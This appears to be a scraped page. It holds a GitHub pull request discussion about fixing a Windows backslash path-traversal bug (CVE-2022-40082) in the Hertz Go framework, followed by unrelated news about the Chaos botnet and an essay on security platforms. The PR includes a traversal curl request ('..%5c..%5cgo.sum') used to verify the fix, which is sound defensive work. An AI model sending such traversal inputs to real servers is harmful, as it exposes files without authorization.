		n += len(bytestr.StrSlashDotDotSlash) \- 1
		copy(b\[nn:\], b\[n:\])
		b \= b\[:len(b)\-n+nn\]
	}

	// remove trailing /foo/..
	n := bytes.LastIndex(b, bytestr.StrSlashDotDot)
	if n \>= 0 && n+len(bytestr.StrSlashDotDot) \== len(b) {
		nn := bytes.LastIndexByte(b\[:n\], '/')
		if nn < 0 {
			return bytestr.StrSlash
		}
		b \= b\[:nn+1\]
	}

	return b
}

After:

func normalizePath(dst, src \[\]byte) \[\]byte {
	// replace all backslashes with forward slashes
	for {
		n := bytes.Index(src, bytestr.StrBackSlash)
		if n < 0 {
			break
		}
		src\[n\] \= '/'
	}
	...
}

**Codecov Report**

> Merging #229 (4ecd30e) into develop (8751608) will **decrease** coverage by 0.02%.  
> The diff coverage is 0.00%.

@@             Coverage Diff             @@
#\#           develop     #229      +/-   ##
===========================================
\- Coverage    59.19%   59.17%   -0.03%     
===========================================
  Files           79       79              
  Lines         8105     8110       +5     
===========================================
+ Hits          4798     4799       +1     
\- Misses        2953     2957       +4     
  Partials       354      354              

Impacted Files

Coverage Δ

pkg/protocol/uri.go

70.34% <0.00%> (-0.72%)

⬇️

pkg/network/standard/buffer.go

81.08% <0.00%> (-0.50%)

⬇️

Help us with your feedback. Take ten seconds to tell us how you rate us. Have a feature suggestion? Share it here.

Copy link

Contributor Author

****ruokeqx** commented Sep 4, 2022**

Copy link

Contributor Author

****ruokeqx** commented Sep 4, 2022**

> When checking other http framework source code, I find that fasthttp community fix the same bug six months ago. Maybe we can borrow some code.
> 
> valyala/fasthttp#1226 valyala/fasthttp@6b5bc7b

They just repeat the logic, there is no need to write duplicate code.  
The point is that backslash also work in windows. So, essentially, we just need to replace the backslash with forward slash, by which we, to some extent, limit the separator.  
In my limited point of view, my fix is better.

@@ -480,6 +480,15 @@ func splitHostURI(host, uri \[\]byte) (\[\]byte, \[\]byte, \[\]byte) {

}

  

func normalizePath(dst, src \[\]byte) \[\]byte {

// replace all backslashes with forward slashes

for {

n := bytes.Index(src, bytestr.StrBackSlash)

**Choose a reason for hiding this comment**

The reason will be displayed to describe this comment to others. Learn more.

1.  Seems it will double check for bytes that have been replaced, is this an performance issue on long paths?
2.  I'm not sure it's a good idea to replace src in place, maybe it's hard to understand that if normalizePath has a return value and also modifies the input parameters.

**Choose a reason for hiding this comment**

The reason will be displayed to describe this comment to others. Learn more.

> 1.  Seems it will double check for bytes that have been replaced, is this an performance issue on long paths?
> 2.  I'm not sure it's a good idea to replace src in place, maybe it's hard to understand that if normalizePath has a return value and also modifies the input parameters.

maybe this one would be better

func normalizePath(dst, src \[\]byte) \[\]byte {
	dst \= dst\[:0\]
	dst \= addLeadingSlash(dst, src)
	dst \= decodeArgAppendNoPlus(dst, src)

	// replace all backslashes with forward slashes
	if filepath.Separator \== '\\\\' {
		for i := range dst {
			if dst\[i\] \== '\\\\' {
				dst\[i\] \= '/'
			}
		}
	}
	...
}

BTW: echo use function filepath.ToSlash

https://github.com/labstack/echo/blob/master/context\_fs.go#L33

func ToSlash(path string) string {
	if Separator \== '/' {
		return path
	}
	return strings.ReplaceAll(path, string(Separator), "/")
}

**Choose a reason for hiding this comment**

The reason will be displayed to describe this comment to others. Learn more.

bytes.IndexByte will do a SIMD accelerate in some platforms. Not sure which one is better.

And since the bug only happens in Windows? Maybe add a if filepath.Separator == '\\' { to filter the platform?

The example/standard demo seems still have the problem in Windows if the url is : 127.0.0.1:8888/..%5c..%5cgo.sum

Copy link

Contributor Author

****ruokeqx** commented Sep 5, 2022 •**

> The example/standard demo seems still have the problem in Windows if the url is : 127.0.0.1:8888/..%5c..%5cgo.sum

this version solve the problem

func normalizePath(dst, src \[\]byte) \[\]byte {
	dst \= dst\[:0\]
	dst \= addLeadingSlash(dst, src)
	dst \= decodeArgAppendNoPlus(dst, src)

	// replace all backslashes with forward slashes
	if filepath.Separator \== '\\\\' {
		for i := range dst {
			if dst\[i\] \== '\\\\' {
				dst\[i\] \= '/'
			}
		}
	}
	...
}

before the if judgment  
src = "/..%5c..%5cgo.sum"  
dst = "//..\\..\\go.sum"

curl -v 127.0.0.1:8888/..%5c..%5cgo.sum
\*   Trying 127.0.0.1:8888...
\* Connected to 127.0.0.1 (127.0.0.1) port 8888 (#0)
\> GET /..%5c..%5cgo.sum HTTP/1.1
\> Host: 127.0.0.1:8888
\> User-Agent: curl/7.83.1
\> Accept: \*/\*
\>
\* Mark bundle as not supporting multiuse
< HTTP/1.1 404 404 Page not found
< Date: Mon, 05 Sep 2022 09:10:07 GMT
< Content-Type: text/plain; charset=utf-8
< Content-Length: 26
<
Cannot open requested path\* Connection #0 to host 127.0.0.1 left intact

> > The example/standard demo seems still have the problem in Windows if the url is : 127.0.0.1:8888/..%5c..%5cgo.sum
> 
> this version solve the problem
> 
> func normalizePath(dst, src \[\]byte) \[\]byte {
> 	dst \= dst\[:0\]
> 	dst \= addLeadingSlash(dst, src)
> 	dst \= decodeArgAppendNoPlus(dst, src)
> 
> 	// replace all backslashes with forward slashes
> 	if filepath.Separator \== '\\\\' {
> 		for i := range dst {
> 			if dst\[i\] \== '\\\\' {
> 				dst\[i\] \= '/'
> 			}
> 		}
> 	}
> 	...
> }
> 
> before the if judgment src = "/..%5c..%5cgo.sum" dst = "//....\\go.sum"
> 
> curl -v 127.0.0.1:8888/..%5c..%5cgo.sum
> \*   Trying 127.0.0.1:8888...
> \* Connected to 127.0.0.1 (127.0.0.1) port 8888 (#0)
> \> GET /..%5c..%5cgo.sum HTTP/1.1
> \> Host: 127.0.0.1:8888
> \> User-Agent: curl/7.83.1
> \> Accept: \*/\*
> \>
> \* Mark bundle as not supporting multiuse
> < HTTP/1.1 404 404 Page not found
> < Date: Mon, 05 Sep 2022 09:10:07 GMT
> < Content-Type: text/plain; charset=utf-8
> < Content-Length: 26
> <
> Cannot open requested path\* Connection #0 to host 127.0.0.1 left intact

Good job! As for the performance part, maybe do a bench test to see the answer.

Copy link

Contributor Author

****ruokeqx** commented Sep 5, 2022**

> > > The example/standard demo seems still have the problem in Windows if the url is : 127.0.0.1:8888/..%5c..%5cgo.sum
> > 
> > this version solve the problem
> > 
> > func normalizePath(dst, src \[\]byte) \[\]byte {
> > 	dst \= dst\[:0\]
> > 	dst \= addLeadingSlash(dst, src)
> > 	dst \= decodeArgAppendNoPlus(dst, src)
> > 
> > 	// replace all backslashes with forward slashes
> > 	if filepath.Separator \== '\\\\' {
> > 		for i := range dst {
> > 			if dst\[i\] \== '\\\\' {
> > 				dst\[i\] \= '/'
> > 			}
> > 		}
> > 	}
> > 	...
> > }
> > 
> > before the if judgment src = "/..%5c..%5cgo.sum" dst = "//....\\go.sum"
> > 
> > curl -v 127.0.0.1:8888/..%5c..%5cgo.sum
> > \*   Trying 127.0.0.1:8888...
> > \* Connected to 127.0.0.1 (127.0.0.1) port 8888 (#0)
> > \> GET /..%5c..%5cgo.sum HTTP/1.1
> > \> Host: 127.0.0.1:8888
> > \> User-Agent: curl/7.83.1
> > \> Accept: \*/\*
> > \>
> > \* Mark bundle as not supporting multiuse
> > < HTTP/1.1 404 404 Page not found
> > < Date: Mon, 05 Sep 2022 09:10:07 GMT
> > < Content-Type: text/plain; charset=utf-8
> > < Content-Length: 26
> > <
> > Cannot open requested path\* Connection #0 to host 127.0.0.1 left intact
> 
> Good job! As for the performance part, maybe do a bench test to see the answer.

I did some simple benchmarks, when there are backslashes in path, for-range option is faster, when there is no backslash in path, IndexByte option is faster.

Choose IndexByte maybe more reasonable since most normal URLs don't have backslashes in them.

var benchDstBackslashShort \= \[\]byte("/..\\\\foo")
var benchDstBackslashLong \= \[\]byte("/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\foo")
var benchDstNoBackslashShort \= \[\]byte("/../foo")
var benchDstNoBackslashLong \= \[\]byte("/../../../../../../../../../../foo")

func BenchmarkForrange(b \*testing.B) {
	for i := 0; i < b.N; i++ {
		for i := range benchDstNoBackslashShort {
			if benchDstNoBackslashShort\[i\] \== '\\\\' {
				benchDstNoBackslashShort\[i\] \= '/'
			}
		}
		benchDstNoBackslashShort \= \[\]byte("/../foo")
	}
}

func BenchmarkIndexByte(b \*testing.B) {
	for i := 0; i < b.N; i++ {
		for {
			n := bytes.IndexByte(benchDstNoBackslashShort, '\\\\')
			if n < 0 {
				break
			}
			benchDstNoBackslashShort\[n\] \= '/'
		}
		benchDstNoBackslashShort \= \[\]byte("/../foo")
	}
}

environment

goos: windows
goarch: amd64
pkg: github.com/cloudwego/hertz/pkg/protocol
cpu: Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz

benchDstBackslashShort

BenchmarkForrange-12     	57650732	        19.92 ns/op	       8 B/op	       1 allocs/op
BenchmarkIndexByte-12    	43823608	        27.97 ns/op	       8 B/op	       1 allocs/op
PASS
ok  	github.com/cloudwego/hertz/pkg/protocol	2.521s

benchDstBackslashLong

BenchmarkForrange-12     	21818498	        52.70 ns/op	      48 B/op	       1 allocs/op
BenchmarkIndexByte-12    	 9185786	       130.1 ns/op	      48 B/op	       1 allocs/op
PASS
ok  	github.com/cloudwego/hertz/pkg/protocol	2.941s

benchDstNoBackslashShort

BenchmarkForrange-12     	53754288	        19.66 ns/op	       8 B/op	       1 allocs/op
BenchmarkIndexByte-12    	61503766	        19.34 ns/op	       8 B/op	       1 allocs/op
PASS
ok  	github.com/cloudwego/hertz/pkg/protocol	2.379s

benchDstNoBackslashLong

BenchmarkForrange-12     	21096711	        49.30 ns/op	      48 B/op	       1 allocs/op
BenchmarkIndexByte-12    	32403181	        37.07 ns/op	      48 B/op	       1 allocs/op
PASS
ok  	github.com/cloudwego/hertz/pkg/protocol	2.724s

PTAL. There may have a side effect which lead to a failure of existing UT

Copy link

Contributor Author

****ruokeqx** commented Sep 6, 2022 •**

My fault. Since we add if filepath.Separator == '\\' {, backslashes were replaced when running UT in my windows laptop. However, linux would not replace them.  
We can pass the the UT by modifying the code like below.

if filepath.Separator \== '\\\\' && string(parsedPath) != expectedPath {
    t.Fatalf("Unexpected Path: %q. Expected %q", parsedPath, expectedPath)
}

Also, github action can not check windows path.

CVE-2022-40082: fix: fix path-traversal bug by ruokeqx · Pull Request #229 · cloudwego/hertz

A new, multi-functional Go-based malware dubbed Chaos has been rapidly growing in volume in recent months to ensnare a wide range of Windows, Linux, small office/home office (SOHO) routers, and enterprise servers into its botnet.
"Chaos functionality includes the ability to enumerate the host environment, run remote shell commands, load additional modules, automatically propagate through

A new, multi-functional Go-based malware dubbed **Chaos** has been rapidly growing in volume in recent months to ensnare a wide range of Windows, Linux, small office/home office (SOHO) routers, and enterprise servers into its botnet.

"Chaos functionality includes the ability to enumerate the host environment, run remote shell commands, load additional modules, automatically propagate through stealing and brute-forcing SSH private keys, as well as launch DDoS attacks," researchers from Lumen's Black Lotus Labs said in a write-up shared with The Hacker News.

A majority of the bots are located in Europe, specifically Italy, with other infections reported in China and the U.S., collectively representing "hundreds of unique IP addresses" over a one-month time period from mid-June through mid-July 2022.

Written in Chinese and leveraging China-based infrastructure for command-and-control, the botnet joins a long list of malware that are designed to establish persistence for extended periods and likely abuse the foothold for nefarious purposes, such as DDoS attacks and cryptocurrency mining.

If anything, the development also points to a dramatic uptick in threat actors shifting to programming languages like Go to evade detection and render reverse engineering difficult, not to mention targeting several platforms at once.

Chaos (not to be confused with the ransomware builder of the same name) lives up to its name by exploiting known security vulnerabilities to gain initial access, subsequently abusing it to conduct reconnaissance and initiate lateral movement across the compromised network.

What's more, the malware has versatility that similar malware does not, enabling it to operate across a wide range of instruction set architectures from ARM, Intel (i386), MIPS, and PowerPC, effectively allowing the threat actor to broaden the scope of its targets and swiftly accrue in volume.

On top of that, Chaos further has the ability to execute as many as 70 different commands sent from the C2 server, one of which is an instruction to trigger the exploitation of publicly-disclosed flaws (CVE-2017-17215 and CVE-2022-30525) defined in a file.

Chaos is also believed to be an evolution of another Go-based DDoS malware named Kaiji that has previously targeted misconfigured Docker instances. The correlations, per Black Lotus Labs, stem from overlapping code and functions based on an analysis of over 100 samples.

A GitLab server located in Europe was one among the victims of the Chaos botnet in the first weeks of September, the company said, adding it identified a string of DDoS attacks aimed at entities spanning gaming, financial services, and technology, media and entertainment, and hosting providers. Also targeted was a crypto mining exchange.

The findings come exactly three months after the cybersecurity company exposed a new remote access trojan dubbed ZuoRAT that has been singling out SOHO routers as part of a sophisticated campaign directed against North American and European networks.

"We are seeing a complex malware that has quadrupled in size in just two months, and it is well-positioned to continue accelerating," said Mark Dehus, director of threat intelligence for Lumen Black Lotus Labs. "Chaos poses a threat to a variety of consumer and enterprise devices and hosts."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Warn of New Go-based Malware Targeting Windows and Linux Systems

The "single pane of glass" that gathers and correlates all the information security professionals need doesn't exist, so it's up to us to create it.

When the Bloomberg Terminal was introduced in 1982, it changed Wall Street forever. The Terminal was a computing marvel, aggregating and correlating more data than ever imagined. From market data to global currencies, commodities and real estate to policy and politics, investors and traders had for the first time a centralized data platform for real-time, multidimensional visibility and analysis. 

After seeing the field differently, users developed new proprietary strategies that led to an explosion in new products, such as index options and mortgage-backed securities. Data analysis kicked off an age of discovery, and it made Wall Street the place to be in the 1980s and beyond.

Today, data analysis is a critical component of any cybersecurity program. Security teams must sift through a dizzying array of inputs and issues in order to separate the signals and noise. They must differentiate between legitimate and malicious activity and prioritize where to take action to mitigate risk and battle adversaries to protect their businesses and customers.

One could argue that artificial intelligence (AI) and machine learning (ML) are leading the much-needed age of advancement in cybersecurity. But thousands of companies are using AI and ML to develop thousands of cybersecurity solutions. Siloed implementations by vendors that have little incentive to collaborate have created massive complexity that ultimately still leaves businesses vulnerable to attacks and exploits. 

The Bloomberg Terminal for cybersecurity — the "single pane of glass" that gathers and correlates all the relevant information security professionals need to do their jobs efficiently — doesn't yet exist. So enterprises are left grappling with where they should begin.

**Protect the Most Critical Asset First**

The approach we have been using to reduce business risk and protect critical assets is not working or scaling to meet the complexity of today's environment or the attack landscape. The focus has been on protecting the infrastructure, the data center, and the devices using a complex web of barriers to limit access. Despite the attention that zero-trust security architectures have received, it seems that as an industry, we struggle to turn the rhetoric into architecture. Businesses are encouraged to move away from moats and castles and toward securing access and applications, but practitioners still tend to focus on building fences around their most critical assets instead of securing the assets themselves.

Yet data is arguably the enterprise's most important asset. Data breaches exposed 21 billion records in 2021. This is why cybercriminals target it and governments around the world regulate it. The business consequences of a data breach have never been higher. According to the 2022 "Cost of a Data Breach" report from IBM and Ponemon, the average cost of a data breach rose to a record $4.35 million in 2022.

As the enterprise transitions to the cloud, this shift dramatically increases the threat surface of an organization, since much of this activity is outside the visibility of the security teams. "The cloud" no longer means a public cloud vendor or two. The modern enterprise environment involves on-prem services, multiple cloud services, software as a service (SaaS), infrastructure as a service (IaaS), and platform as a service (PaaS) all securing managed and unmanaged devices, with hybrid employees and third parties all requiring access to business assets. Security professionals have no way to see it all, certainly not in a dashboard view.

**Protect the Whole Enterprise**

Few organizations speak with more CISOs than Gartner. According to "Gartner Predicts 2022," consolidated security platforms are the future:

_Vendors are increasingly divided into 'platform' and 'portfolio' camps, with the former integrating tools to make a whole that's greater than the sum of the parts, and the latter packaging products with little integration. Technology consolidation is not limited to one technology area or even to a closely related set of technologies; these consolidations are happening in parallel across many security areas._

The Bloomberg Terminal for cybersecurity may never exist in the way security professionals dream about, so it'll be up to them to envision and create their own version. This is harder than it might seem, as evidenced by the increasing disillusionment security practitioners feel with their security information and management (SIEM) implementations — where big data leads to big bills but not deep insights — and the growth of more specialized event management and extended detection and response (XDR) solutions. This will require a review of that sea of options to select the tools that make the most sense for each layer of the enterprise.

Could we end up with a handful of platforms built on open standards? For the sake of enterprise risk, and the people doing the work, let's hope so.

Tag

#intel